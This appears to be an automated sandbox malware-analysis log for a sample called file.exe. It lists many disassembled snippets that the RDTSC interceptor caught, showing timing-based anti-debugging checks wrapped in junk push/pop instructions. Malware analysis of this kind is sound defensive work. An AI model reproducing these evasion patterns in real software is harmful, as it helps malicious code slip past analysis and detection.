Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B21E5 second address: 4B21FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4456h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5352D4 second address: 535308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B7530A294h 0x00000009 pop ecx 0x0000000a pushad 0x0000000b jl 00007F3B7530A29Eh 0x00000011 jmp 00007F3B7530A292h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535308 second address: 535331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 je 00007F3B74DE4446h 0x0000000d push esi 0x0000000e pop esi 0x0000000f jng 00007F3B74DE4446h 0x00000015 popad 0x00000016 pushad 0x00000017 jnc 00007F3B74DE4446h 0x0000001d jnc 00007F3B74DE4446h 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 push ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538DF8 second address: 538E08 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F3B7530A286h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5036BD second address: 5036C7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5036C7 second address: 5036CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5036CB second address: 5036CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5036CF second address: 503754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F3B7530A288h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 call 00007F3B7530A28Eh 0x00000029 mov dword ptr [ebp+122D2C7Eh], edi 0x0000002f pop edx 0x00000030 lea eax, dword ptr [ebp+12485449h] 0x00000036 mov dword ptr [ebp+122D1889h], ecx 0x0000003c nop 0x0000003d pushad 0x0000003e jmp 00007F3B7530A292h 0x00000043 jmp 00007F3B7530A290h 0x00000048 popad 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F3B7530A290h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 503926 second address: 50392C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50392C second address: 503930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 503F4B second address: 503F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50401C second address: 504021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504021 second address: 50403A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B74DE4455h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504262 second address: 504268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504268 second address: 50426C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 504952 second address: 5049AE instructions: 0x00000000 rdtsc 0x00000002 js 00007F3B7530A28Ch 0x00000008 jnl 00007F3B7530A286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007F3B7530A288h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000015h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d pushad 0x0000002e mov eax, dword ptr [ebp+122D255Fh] 0x00000034 adc di, B0E6h 0x00000039 popad 0x0000003a lea eax, dword ptr [ebp+1248548Dh] 0x00000040 movzx edx, di 0x00000043 jp 00007F3B7530A28Ch 0x00000049 or dword ptr [ebp+122D1BAFh], edi 0x0000004f nop 0x00000050 jbe 00007F3B7530A28Eh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5049AE second address: 4E6526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jbe 00007F3B74DE4452h 0x0000000c jnp 00007F3B74DE444Ch 0x00000012 ja 00007F3B74DE4446h 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F3B74DE4448h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 pushad 0x00000034 mov dword ptr [ebp+122D1832h], edx 0x0000003a jl 00007F3B74DE444Ch 0x00000040 mov ecx, dword ptr [ebp+122D3264h] 0x00000046 popad 0x00000047 mov ecx, ebx 0x00000049 lea eax, dword ptr [ebp+12485449h] 0x0000004f mov edi, eax 0x00000051 push eax 0x00000052 jmp 00007F3B74DE4453h 0x00000057 mov dword ptr [esp], eax 0x0000005a mov dx, AEA1h 0x0000005e call dword ptr [ebp+122D2B7Dh] 0x00000064 pushad 0x00000065 jns 00007F3B74DE444Eh 0x0000006b push ebx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539571 second address: 53958E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3B7530A298h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53958E second address: 539594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539768 second address: 539771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539A6E second address: 539A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539BC8 second address: 539BDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F3B7530A286h 0x00000009 jne 00007F3B7530A286h 0x0000000f popad 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F7C0 second address: 53F7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F3B74DE444Bh 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E21F second address: 53E223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E223 second address: 53E23C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B74DE4453h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53EEAE second address: 53EEB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53EEB5 second address: 53EED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 push ebx 0x00000009 jmp 00007F3B74DE4453h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53EED3 second address: 53EEDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53EEDC second address: 53EEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53EEE0 second address: 53EEE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F01A second address: 53F020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F020 second address: 53F042 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A28Fh 0x00000007 jmp 00007F3B7530A28Fh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53F042 second address: 53F076 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3B74DE4459h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F3B74DE4446h 0x0000001a jp 00007F3B74DE4446h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5424DF second address: 5424E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5424E7 second address: 5424F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F3B74DE4446h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5424F7 second address: 5424FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5424FD second address: 542501 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5481D9 second address: 5481ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F3B7530A28Ch 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550B7F second address: 550B83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550B83 second address: 550B89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550B89 second address: 550BAB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3B74DE4458h 0x00000008 jmp 00007F3B74DE4450h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F3B74DE4446h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550BAB second address: 550BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54FFAF second address: 54FFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F3B74DE4456h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550145 second address: 55015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F3B7530A286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007F3B7530A288h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55042D second address: 550444 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE444Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F3B74DE446Fh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550444 second address: 550463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B7530A28Bh 0x00000009 jp 00007F3B7530A286h 0x0000000f popad 0x00000010 pushad 0x00000011 jne 00007F3B7530A286h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5505CB second address: 5505DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F3B74DE4446h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5505DA second address: 5505DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55077A second address: 550785 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 550785 second address: 55078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 554F3A second address: 554F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55507F second address: 555085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555085 second address: 55508B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55508B second address: 555090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555090 second address: 5550AD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F3B74DE4451h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5550AD second address: 5550B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5550B3 second address: 5550B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5550B7 second address: 5550EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A294h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3B7530A297h 0x0000000f je 00007F3B7530A286h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5550EE second address: 555104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F3B74DE4450h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 555104 second address: 555128 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B7530A297h 0x00000007 jg 00007F3B7530A286h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5553B5 second address: 5553BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5554F6 second address: 5554FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5557B7 second address: 5557BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5557BC second address: 5557C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F3B7530A286h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5557C8 second address: 5557D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55EA7F second address: 55EA85 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CAB8 second address: 55CAC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F3B74DE4446h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55CAC9 second address: 55CACD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55D4DC second address: 55D4E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55DAFC second address: 55DB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F3B7530A286h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55DE06 second address: 55DE0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55DE0A second address: 55DE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F3B7530A286h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F3B7530A299h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55DE2F second address: 55DE35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55DE35 second address: 55DE3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55DE3F second address: 55DE61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F3B74DE4454h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55DE61 second address: 55DEA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F3B7530A297h 0x0000000a jmp 00007F3B7530A295h 0x0000000f popad 0x00000010 jng 00007F3B7530A296h 0x00000016 jmp 00007F3B7530A28Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E126 second address: 55E12B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E12B second address: 55E15B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3B7530A297h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3B7530A290h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E15B second address: 55E169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E169 second address: 55E16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E16D second address: 55E188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B74DE4457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E188 second address: 55E18D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E18D second address: 55E193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E193 second address: 55E199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E199 second address: 55E1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E1A1 second address: 55E1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E44C second address: 55E450 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E450 second address: 55E465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jng 00007F3B7530A286h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E465 second address: 55E46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E744 second address: 55E754 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3B7530A286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 55E754 second address: 55E788 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F3B74DE4453h 0x0000000c jmp 00007F3B74DE4458h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561A21 second address: 561A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F3B7530A28Eh 0x0000000a jo 00007F3B7530A286h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 561A3C second address: 561A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
